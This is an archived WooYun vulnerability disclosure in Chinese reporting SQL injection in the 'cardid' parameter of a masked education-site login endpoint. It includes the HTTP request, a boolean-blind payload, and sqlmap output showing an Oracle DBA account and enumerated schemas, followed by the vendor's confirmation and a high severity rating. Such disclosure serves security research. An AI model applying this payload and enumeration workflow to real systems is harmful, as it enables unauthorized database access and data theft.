乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-20: 细节已通知厂商并且等待厂商处理中 2015-12-24: 厂商已经确认,细节仅向厂商公开 2016-01-03: 细节向核心白帽子及相关领域专家公开 2016-01-13: 细节向普通白帽子公开 2016-01-23: 细节向实习白帽子公开 2016-02-06: 细节向公众公开
RT
http://**.**.**.**
POST /login.shtml?cardid=-1&date=1449770720840&method=compareCardid&role=3 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://**.**.**.**Cookie: JSESSIONID=3017C0DDC9647B25A515F42EEBC7BD27; AD_RS_COOKIE=20110649Host: **.**.**.**Content-Length: 0Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
cardid参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: cardid (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: cardid=-2895' OR 2468=2468 AND 'NAAl'='NAAl&date=1449770720840&method=compareCardid&role=3---[14:49:11] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[14:49:11] [INFO] fetching current user[14:49:12] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[14:49:12] [INFO] retrieved: F_EDUcurrent user: 'F_EDU'[14:49:49] [INFO] fetching current database[14:49:49] [INFO] resumed: F_EDU[14:49:49] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSescurrent schema (equivalent to database on Oracle): 'F_EDU'[14:49:49] [INFO] testing if current user is DBAcurrent user is DBA: True[14:49:50] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[14:49:50] [INFO] fetching database (schema) names[14:49:50] [INFO] fetching number of databases[14:49:50] [INFO] retrieved: 24[14:50:10] [INFO] retrieved: APEX_030200[14:52:41] [INFO] retrieved: APPQOSSYS[14:54:54] [INFO] retrieved: CTXSYS[14:56:25] [INFO] retrieved: DBSNMP[14:57:49] [INFO] retrieved: DD[14:58:31] [INFO] retrieved: EDU[14:59:19] [INFO] retrieved: EDUDB[15:00:42] [INFO] retrieved: EDU_FINAL[15:02:47] [INFO] retrieved: EXFSYS[15:04:37] [INFO] retrieved: FLOWS_FILES[15:07:13] [INFO] retrieved: F_EDU[15:08:27] [INFO] retrieved: F_EDU_YX
网卡,就这样了.
多处存在注入
危害等级:高
漏洞Rank:10
确认时间:2015-12-24 17:04
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:10正在联系相关网站管理单位处置。
暂无